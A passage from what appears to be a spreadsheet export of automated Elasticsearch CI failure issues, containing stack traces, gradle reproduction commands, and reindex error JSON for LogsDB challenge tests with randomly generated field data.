org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$DelegatingResponseActionListener.onFailure(ActionListenerImplementations.java:193)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable.onFailure(ActionRunnable.java:152)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:29)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.TimedRunnable.doRun(TimedRunnable.java:34)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.base/java.lang.Thread.run(Thread.java:1575)\nCaused by: Failed to execute phase [query], all shards failed; shardFailures {[dwLlIVxDQ5q53IevMMxPpw][.ml-stats-000001][0]: org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n}\n\t 28 more\nCaused by: org.elasticsearch.action.NoShardAvailableActionException: [yamlRestTest-0][127.0.0.1:40257][indices:data/read/search[phase/query]]\n"},"status":500}]  **Issue Reasons:** - [main] 4 failures in test test {p0=ml/data_frame_analytics_cat_apis/Test cat data frame analytics all jobs with header} (0.9% fail rate in 447 executions) - [main] 3 failures in step rest-compatibility (2.4% fail rate in 126 executions) - [main] 3 failures in pipeline elasticsearch-pull-request (2.3% fail rate in 130 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119355</t>
  </si>
  <si>
    <t>[CI] LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT testEsqlTermsAggregationByMethod failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #15076 / part2](https://gradle-enterprise.elastic.co/s/to74swlexdyos) - [elasticsearch-periodic #5614 / concurrent-search-tests](https://gradle-enterprise.elastic.co/s/o52eqn7ra2cfw) **Reproduction Line:**  ./gradlew ":x-pack:plugin:logsdb:javaRestTest" --tests "org.elasticsearch.xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT.testEsqlTermsAggregationByMethod" -Dtests.seed=ED8F52D81785D8C6 -Dtests.locale=ru-UA -Dtests.timezone=America/Guatemala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xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testEsqlTermsAggregationByMethod),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:42039], URI [/_reindex?refresh=true], status line [HTTP/1.1 400 Bad Request] {"took":1568,"timed_out":false,"total":57,"updated":0,"created":44,"deleted":0,"batches":1,"version_conflicts":0,"noops":0,"retries":{"bulk":0,"search":0},"throttled_millis":0,"requests_per_second":-1.0,"throttled_until_millis":0,"failures":[{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"55","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:9548] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"20","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:5515] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"25","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:18657] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"37","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:16994] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"35","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:5902] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"19","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:6681] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"30","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:11226] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"56","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:9618] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"34","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:20850] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"41","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:8849] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"22","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:19121] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"49","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:8487] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.30-000001","id":"9","cause":{"type":"strict_dynamic_mapping_exception","reason":"[1:4758] mapping set to strict, dynamic introduction of [JnzGkqRYVU] within [bVO.XrxLtcbti] is not allowed"},"status":400,"failure_store":"not_enabled"}]}  **Issue Reasons:** - [main] 2 failures in test testEsqlTermsAggregationByMethod (1.9% fail rate in 108 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119432</t>
  </si>
  <si>
    <t>[CI] LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT testMatchAllQuery failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5639 / concurrent-search-tests](https://gradle-enterprise.elastic.co/s/q2vvjecuwkbka) - [elasticsearch-intake #14998 / part2](https://gradle-enterprise.elastic.co/s/bnlyc3a3mekio) **Reproduction Line:**  ./gradlew ":x-pack:plugin:logsdb:javaRestTest" --tests "org.elasticsearch.xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT.testMatchAllQuery" -Dtests.seed=299DF420CBE27E14 -Dtests.jvm.argline="-Des.concurrent_search=true" -Dtests.locale=lg-Latn-UG -Dtests.timezone=CTT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xpack.logsdb.qa.LogsDbVersusLogsDbReindexedIntoStandardModeChallengeRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testMatchAllQuery),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.ResponseException: method [POST], host [http://[::1]:44679], URI [/_reindex?refresh=true], status line [HTTP/1.1 400 Bad Request] {"took":1426,"timed_out":false,"total":98,"updated":0,"created":76,"deleted":0,"batches":1,"version_conflicts":0,"noops":0,"retries":{"bulk":0,"search":0},"throttled_millis":0,"requests_per_second":-1.0,"throttled_until_millis":0,"failures":[{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"2","cause":{"type":"document_parsing_exception","reason":"[1:434] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '2'. Preview of field's value: '12597721579812552704'","caused_by":{"type":"x_content_parse_exception","reason":"[1:454] Numeric value (12597721579812552704) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:02.000Z\",\"BIYicntUj\":-6188,\"CbG\":[0.023925781,0.13671875,0.24365234],\"CnlgHF\":[0.7388776,0.5052575,0.47951663],\"FOYeRxqD\":[],\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":[],\"BuiKGz\":[],\"DHcLlRsZgc\":\"aTAoOujDtelGYXIvRXDsNuCMyZ\",\"E\":[0.8548772,0.15464652,0.2813716],\"EPdEAaLSa\":0.9862691984547172,\"GNHsDs\":[-6961,-8825,-24747],\"Hbv\":[-3450506571302081814,6782304579571874248],\"HwKSDXz\":3380034248822803475,\"JTbUil\":12597721579812552704,\"JdMdRqx\":[0.7525282,0.5865605,0.66369945,0.86\"[truncated 128492 bytes]; line: 1, column: 454]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (12597721579812552704) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:02.000Z\",\"BIYicntUj\":-6188,\"CbG\":[0.023925781,0.13671875,0.24365234],\"CnlgHF\":[0.7388776,0.5052575,0.47951663],\"FOYeRxqD\":[],\"GqPKDgPcW\":[{\"QkUddgG\":[{\"BbgI\":[],\"BuiKGz\":[],\"DHcLlRsZgc\":\"aTAoOujDtelGYXIvRXDsNuCMyZ\",\"E\":[0.8548772,0.15464652,0.2813716],\"EPdEAaLSa\":0.9862691984547172,\"GNHsDs\":[-6961,-8825,-24747],\"Hbv\":[-3450506571302081814,6782304579571874248],\"HwKSDXz\":3380034248822803475,\"JTbUil\":12597721579812552704,\"JdMdRqx\":[0.7525282,0.5865605,0.66369945,0.86\"[truncated 128492 bytes]; line: 1, column: 454]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"45","cause":{"type":"document_parsing_exception","reason":"[1:5948] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '45'. Preview of field's value: '16215741535348588544'","caused_by":{"type":"x_content_parse_exception","reason":"[1:5968] Numeric value (16215741535348588544) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:45.000Z\",\"BIYicntUj\":[],\"CbG\":[0.13464355,0.19421387,0.53271484,0.9199219],\"CnlgHF\":[0.11389321,0.8796246,0.13094997,0.29445976,0.65483487],\"FOYeRxqD\":0.7,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":0.7135051,\"pQZPIdLGV\":[1840]},\"HpTJPhI\":[0.8744243,0.23280847,0.874569,0.50293154,0.99252504],\"N\":0.30496448,\"TuMKO\":[76,null,-63,-99,-53],\"azG\":5949,\"bSi\":[0.41842818,0.41283262,0.13515604],\"cgzCjnilT\":[null,\"\"],\"cuh\":[{\"Cz\":65,\"EkjTaI\":0.24517941273236066,\"K\":123,\"NgMkae\":[],\"\"[truncated 175126 bytes]; line: 1, column: 5968]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (16215741535348588544) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:45.000Z\",\"BIYicntUj\":[],\"CbG\":[0.13464355,0.19421387,0.53271484,0.9199219],\"CnlgHF\":[0.11389321,0.8796246,0.13094997,0.29445976,0.65483487],\"FOYeRxqD\":0.7,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":0.7135051,\"pQZPIdLGV\":[1840]},\"HpTJPhI\":[0.8744243,0.23280847,0.874569,0.50293154,0.99252504],\"N\":0.30496448,\"TuMKO\":[76,null,-63,-99,-53],\"azG\":5949,\"bSi\":[0.41842818,0.41283262,0.13515604],\"cgzCjnilT\":[null,\"\"],\"cuh\":[{\"Cz\":65,\"EkjTaI\":0.24517941273236066,\"K\":123,\"NgMkae\":[],\"\"[truncated 175126 bytes]; line: 1, column: 5968]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"56","cause":{"type":"document_parsing_exception","reason":"[1:1633] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '56'. Preview of field's value: '11699359926391406591'","caused_by":{"type":"x_content_parse_exception","reason":"[1:1653] Numeric value (11699359926391406591) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:56.000Z\",\"BIYicntUj\":[17098,28533,-29663,-11569],\"CbG\":[0.296875,0.4790039],\"CnlgHF\":0.9138833,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":[0.78340596,0.69521695],\"pQZPIdLGV\":[808,7102,null,-15454]},\"HpTJPhI\":[],\"N\":[0.059061825,0.22358543],\"TuMKO\":[65,-128],\"azG\":[],\"bSi\":0.9031135,\"cgzCjnilT\":\"nAzcEVAJQnjUzynsixXbmQKjZsLBjauXBPlGcNQg\",\"cuh\":{\"Cz\":-4,\"EkjTaI\":0.09798728418784808,\"K\":-18,\"NgMkae\":[0.09530518279455458,0.5743527589696549,0.1448472537747213,0.5482105909549286,\"[truncated 58615 bytes]; line: 1, column: 1653]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (11699359926391406591) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:56.000Z\",\"BIYicntUj\":[17098,28533,-29663,-11569],\"CbG\":[0.296875,0.4790039],\"CnlgHF\":0.9138833,\"GqPKDgPcW\":[{\"AiIldqn\":{\"PvKeuk\":[0.78340596,0.69521695],\"pQZPIdLGV\":[808,7102,null,-15454]},\"HpTJPhI\":[],\"N\":[0.059061825,0.22358543],\"TuMKO\":[65,-128],\"azG\":[],\"bSi\":0.9031135,\"cgzCjnilT\":\"nAzcEVAJQnjUzynsixXbmQKjZsLBjauXBPlGcNQg\",\"cuh\":{\"Cz\":-4,\"EkjTaI\":0.09798728418784808,\"K\":-18,\"NgMkae\":[0.09530518279455458,0.5743527589696549,0.1448472537747213,0.5482105909549286,\"[truncated 58615 bytes]; line: 1, column: 1653]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"95","cause":{"type":"document_parsing_exception","reason":"[1:480] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '95'. Preview of field's value: '18325279108633722880'","caused_by":{"type":"x_content_parse_exception","reason":"[1:500] Numeric value (18325279108633722880) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:35.000Z\",\"BIYicntUj\":-8125,\"CbG\":0.94384766,\"CnlgHF\":0.73794967,\"FOYeRxqD\":[0.10430857408373528,0.6219247845068092,0.14318996705083964],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":1899025971,\"BuiKGz\":0.803787727731823,\"DHcLlRsZgc\":\"IWaMsQpFCxOxPuEHQCProaiMqCELRUEEbOWEBmQwbphKJwsQL\",\"E\":0.8831572,\"EPdEAaLSa\":0.48058700901154594,\"GNHsDs\":11253,\"Hbv\":null,\"HwKSDXz\":[2711671735978630965,1937704660098313464,-8739918164729028396,-1762850799328856392],\"JTbUil\":[18325279108633722880,\"[truncated 57545 bytes]; line: 1, column: 500]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (18325279108633722880) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:35.000Z\",\"BIYicntUj\":-8125,\"CbG\":0.94384766,\"CnlgHF\":0.73794967,\"FOYeRxqD\":[0.10430857408373528,0.6219247845068092,0.14318996705083964],\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":1899025971,\"BuiKGz\":0.803787727731823,\"DHcLlRsZgc\":\"IWaMsQpFCxOxPuEHQCProaiMqCELRUEEbOWEBmQwbphKJwsQL\",\"E\":0.8831572,\"EPdEAaLSa\":0.48058700901154594,\"GNHsDs\":11253,\"Hbv\":null,\"HwKSDXz\":[2711671735978630965,1937704660098313464,-8739918164729028396,-1762850799328856392],\"JTbUil\":[18325279108633722880,\"[truncated 57545 bytes]; line: 1, column: 500]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"48","cause":{"type":"document_parsing_exception","reason":"[1:3001] failed to parse field [GqPKDgPcW.QkUddgG.rln.uZDP] of type [long] in document with id '48'. Preview of field's value: '11651860272452206592'","caused_by":{"type":"x_content_parse_exception","reason":"[1:3021] Numeric value (11651860272452206592) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:48.000Z\",\"BIYicntUj\":20649,\"CbG\":[0.06036377,0.28564453,0.38989258,0.53515625],\"CnlgHF\":[],\"FOYeRxqD\":0.5,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":-639675678,\"BuiKGz\":[0.18348822255780883,0.005333428702404497,0.19419311703925002],\"DHcLlRsZgc\":[\"HtOATehzreFgFyyLQ\",\"keeHRixYlcjCuy\",\"jSKkLvROaGGKaFOHwLxOgNlJTHZWIcqPMxgSHi\",\"QtcChYXGPwDoiQiFAQKtIiXksvjWBRRtVwe\"],\"E\":0.19153148,\"EPdEAaLSa\":[0.9703665507066694,null,0.6619849402246725,0.003852208487169495],\"GNHsDs\":-16490,\"Hbv\":[\"[truncated 71881 bytes]; line: 1, column: 3021]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (11651860272452206592) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:48.000Z\",\"BIYicntUj\":20649,\"CbG\":[0.06036377,0.28564453,0.38989258,0.53515625],\"CnlgHF\":[],\"FOYeRxqD\":0.5,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":-639675678,\"BuiKGz\":[0.18348822255780883,0.005333428702404497,0.19419311703925002],\"DHcLlRsZgc\":[\"HtOATehzreFgFyyLQ\",\"keeHRixYlcjCuy\",\"jSKkLvROaGGKaFOHwLxOgNlJTHZWIcqPMxgSHi\",\"QtcChYXGPwDoiQiFAQKtIiXksvjWBRRtVwe\"],\"E\":0.19153148,\"EPdEAaLSa\":[0.9703665507066694,null,0.6619849402246725,0.003852208487169495],\"GNHsDs\":-16490,\"Hbv\":[\"[truncated 71881 bytes]; line: 1, column: 3021]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"81","cause":{"type":"document_parsing_exception","reason":"[1:369] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '81'. Preview of field's value: '13971110507411668991'","caused_by":{"type":"x_content_parse_exception","reason":"[1:389] Numeric value (13971110507411668991) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:21.000Z\",\"BIYicntUj\":[2960,-10684,null,-23093,29468],\"CbG\":0.64160156,\"CnlgHF\":0.97538424,\"FOYeRxqD\":0.6,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[-1972340324],\"BuiKGz\":[],\"DHcLlRsZgc\":\"ceYCmhzGiRwYVRZXoZbYATlmpd\",\"E\":0.44821167,\"EPdEAaLSa\":[0.2857690404923765,0.4408684258962918],\"GNHsDs\":[null],\"Hbv\":[],\"HwKSDXz\":6773225889689825067,\"JTbUil\":13971110507411668991,\"JdMdRqx\":[0.37579942],\"JgACFgJk\":[0.9004489],\"KBnpEj\":[],\"LVieIM\":[],\"S\":[17115933454723186687],\"TfNQSXijr\":[1\"[truncated 122790 bytes]; line: 1, column: 389]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (13971110507411668991) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:01:21.000Z\",\"BIYicntUj\":[2960,-10684,null,-23093,29468],\"CbG\":0.64160156,\"CnlgHF\":0.97538424,\"FOYeRxqD\":0.6,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[-1972340324],\"BuiKGz\":[],\"DHcLlRsZgc\":\"ceYCmhzGiRwYVRZXoZbYATlmpd\",\"E\":0.44821167,\"EPdEAaLSa\":[0.2857690404923765,0.4408684258962918],\"GNHsDs\":[null],\"Hbv\":[],\"HwKSDXz\":6773225889689825067,\"JTbUil\":13971110507411668991,\"JdMdRqx\":[0.37579942],\"JgACFgJk\":[0.9004489],\"KBnpEj\":[],\"LVieIM\":[],\"S\":[17115933454723186687],\"TfNQSXijr\":[1\"[truncated 122790 bytes]; line: 1, column: 389]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"54","cause":{"type":"document_parsing_exception","reason":"[1:4971] failed to parse field [GqPKDgPcW.QkUddgG.mGe] of type [long] in document with id '54'. Preview of field's value: '10734539890357174272'","caused_by":{"type":"x_content_parse_exception","reason":"[1:4991] Numeric value (10734539890357174272) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:54.000Z\",\"CbG\":0.6772461,\"CnlgHF\":0.4259978,\"FOYeRxqD\":1.0,\"GqPKDgPcW\":[{\"AiIldqn\":[{\"PvKeuk\":[],\"pQZPIdLGV\":[11903,-10312,17794,3294,-1659]},{\"PvKeuk\":0.60157984,\"pQZPIdLGV\":[]},{\"PvKeuk\":[0.81003743,0.18692529],\"pQZPIdLGV\":[-12462]}],\"HpTJPhI\":0.39796233,\"N\":[],\"TuMKO\":[null],\"azG\":[14366,-7033,-10301,null,-1879],\"bSi\":0.6612475,\"cgzCjnilT\":[\"WLQFGYJSjMqibzCLqUomGVGreww\",\"qwxHruMwtEXfKzgvhRMNQwZhLP\",\"IvsCLGusLKQucPLSIFtcbDqChdUydlZBZYDOdgWfnPmnQc\",\"AOVOzbAThvVWn\"[truncated 77886 bytes]; line: 1, column: 4991]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (10734539890357174272) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:54.000Z\",\"CbG\":0.6772461,\"CnlgHF\":0.4259978,\"FOYeRxqD\":1.0,\"GqPKDgPcW\":[{\"AiIldqn\":[{\"PvKeuk\":[],\"pQZPIdLGV\":[11903,-10312,17794,3294,-1659]},{\"PvKeuk\":0.60157984,\"pQZPIdLGV\":[]},{\"PvKeuk\":[0.81003743,0.18692529],\"pQZPIdLGV\":[-12462]}],\"HpTJPhI\":0.39796233,\"N\":[],\"TuMKO\":[null],\"azG\":[14366,-7033,-10301,null,-1879],\"bSi\":0.6612475,\"cgzCjnilT\":[\"WLQFGYJSjMqibzCLqUomGVGreww\",\"qwxHruMwtEXfKzgvhRMNQwZhLP\",\"IvsCLGusLKQucPLSIFtcbDqChdUydlZBZYDOdgWfnPmnQc\",\"AOVOzbAThvVWn\"[truncated 77886 bytes]; line: 1, column: 4991]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"37","cause":{"type":"document_parsing_exception","reason":"[1:497] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '37'. Preview of field's value: '11235185862771736576'","caused_by":{"type":"x_content_parse_exception","reason":"[1:517] Numeric value (11235185862771736576) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:37.000Z\",\"BIYicntUj\":7636,\"CbG\":[0.17822266,0.4621582],\"CnlgHF\":[0.14687544,0.560871],\"FOYeRxqD\":0.5,\"GqPKDgPcW\":{\"QkUddgG\":{\"BbgI\":-351428405,\"BuiKGz\":0.07883761098139819,\"DHcLlRsZgc\":[\"CV\",\"achwh\",\"ocaNPJomtcKJYZOBWMQnPDETiGtCAFCRdmjUpM\",\"xdpdTjJQmSbCLJovIhDkcx\"],\"E\":[0.5920385],\"EPdEAaLSa\":0.4317294344555278,\"GNHsDs\":[null,13125,13160,-13793,-6860],\"Hbv\":-4146024862419511655,\"HwKSDXz\":[-1020046961964152581,4161197635677643353,8735684778007294174],\"JTbUil\":[1123\"[truncated 155592 bytes]; line: 1, column: 517]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (11235185862771736576) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:37.000Z\",\"BIYicntUj\":7636,\"CbG\":[0.17822266,0.4621582],\"CnlgHF\":[0.14687544,0.560871],\"FOYeRxqD\":0.5,\"GqPKDgPcW\":{\"QkUddgG\":{\"BbgI\":-351428405,\"BuiKGz\":0.07883761098139819,\"DHcLlRsZgc\":[\"CV\",\"achwh\",\"ocaNPJomtcKJYZOBWMQnPDETiGtCAFCRdmjUpM\",\"xdpdTjJQmSbCLJovIhDkcx\"],\"E\":[0.5920385],\"EPdEAaLSa\":0.4317294344555278,\"GNHsDs\":[null,13125,13160,-13793,-6860],\"Hbv\":-4146024862419511655,\"HwKSDXz\":[-1020046961964152581,4161197635677643353,8735684778007294174],\"JTbUil\":[1123\"[truncated 155592 bytes]; line: 1, column: 517]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"32","cause":{"type":"document_parsing_exception","reason":"[1:463] failed to parse field [GqPKDgPcW.QkUddgG.KBnpEj] of type [long] in document with id '32'. Preview of field's value: '13067920885548056575'","caused_by":{"type":"x_content_parse_exception","reason":"[1:483] Numeric value (13067920885548056575) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:32.000Z\",\"BIYicntUj\":-16306,\"CnlgHF\":0.43101537,\"FOYeRxqD\":0.5,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[487236378,null,2075282027,-1214504995],\"BuiKGz\":[0.5622504986202512,0.2649572733009774],\"DHcLlRsZgc\":\"YoOfQYDwowpmfXraXrpdJeBUwlOOZaYCegZ\",\"E\":0.8924877,\"EPdEAaLSa\":0.46580924911411303,\"GNHsDs\":[13838],\"Hbv\":[],\"HwKSDXz\":-4623761477804231335,\"JTbUil\":6442410262069772287,\"JdMdRqx\":[0.29152685,0.624588],\"JgACFgJk\":0.91260535,\"KBnpEj\":13067920885548056575,\"LVieIM\":[0.82226\"[truncated 141885 bytes]; line: 1, column: 483]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (13067920885548056575) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:32.000Z\",\"BIYicntUj\":-16306,\"CnlgHF\":0.43101537,\"FOYeRxqD\":0.5,\"GqPKDgPcW\":[{\"QkUddgG\":{\"BbgI\":[487236378,null,2075282027,-1214504995],\"BuiKGz\":[0.5622504986202512,0.2649572733009774],\"DHcLlRsZgc\":\"YoOfQYDwowpmfXraXrpdJeBUwlOOZaYCegZ\",\"E\":0.8924877,\"EPdEAaLSa\":0.46580924911411303,\"GNHsDs\":[13838],\"Hbv\":[],\"HwKSDXz\":-4623761477804231335,\"JTbUil\":6442410262069772287,\"JdMdRqx\":[0.29152685,0.624588],\"JgACFgJk\":0.91260535,\"KBnpEj\":13067920885548056575,\"LVieIM\":[0.82226\"[truncated 141885 bytes]; line: 1, column: 483]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2024.12.31-000001","id":"96","cause":{"type":"document_parsing_exception","reason":"[1:8275] failed to parse field [GqPKDgPcW.QkUddgG.JTbUil] of type [long] in document with id '96'. Preview of field's value: '13718023628145033215'","caused_by":{"type":"x_content_parse_exception","reason":"[1:8295] Numeric value (13718023628145033215) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: 